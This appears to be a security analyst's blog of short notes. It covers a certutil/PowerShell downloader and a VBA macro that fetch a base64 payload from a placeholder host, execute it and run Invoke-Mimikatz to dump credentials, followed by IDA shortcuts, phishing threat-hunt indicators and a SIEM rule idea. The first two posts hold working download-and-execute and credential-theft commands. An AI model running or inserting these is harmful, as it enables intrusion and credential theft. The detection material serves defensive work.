Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz

certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string);

Invoke-Mimikatz -DumpCreds

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")

Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")

Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")

Sunday, November 7, 2021

Batch Script run Strings on all Files Searching for Keyword

 for %%f in (*) do (

    c:\users\221602\desktop\neo_apps\strings64.exe -n 8 %%f | findstr github


Thursday, September 30, 2021

IDA Pro Keyboard Shortcuts

 Ascii strings

"highlight the string", press 'a'

Unicode strings

highlight the ascii string, press 'Alt-a', choose unicode

Rename variable

highlight variable, press 'n'

Cross References

highlight the variable, press 'x'


into f7

over f8

run until return ctrl-f7

continue f9



jump to address

press 'g', enter address



comment a line

press ';', enter the comment

Friday, September 10, 2021

Threat Hunt - Proxy Phishing from HTML attachment

 proxy #threathunt idea:

where urlpath = '/next.php' and method = 'POST' and referrer is null cred #phishing 9/10/21 Sharepoint Theme sbj: notification 1 new FAX from: mout.kundenserver[.de HTML attachment posts stolen creds to gms4372.nelrg[.com/gfkn/next.php

Threat Hunt - Proxy C2 IP with PHP

potential proxy #threathunt idea

post or put to urls that contain ip address and php

domain matches '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'
method in ('POST', 'PUT')
urlpath endswith '.php'

Siem Rule - IP Lookup Service

 Malware IP lookup service #siem detection rule idea

dns request in:

















imagename not in 

 - brave.exe

 - iexplore.exe

 - opera.exe

 - firefox.exe

 - msedge.exe

 - chrome.exe

 - vivaldi.exe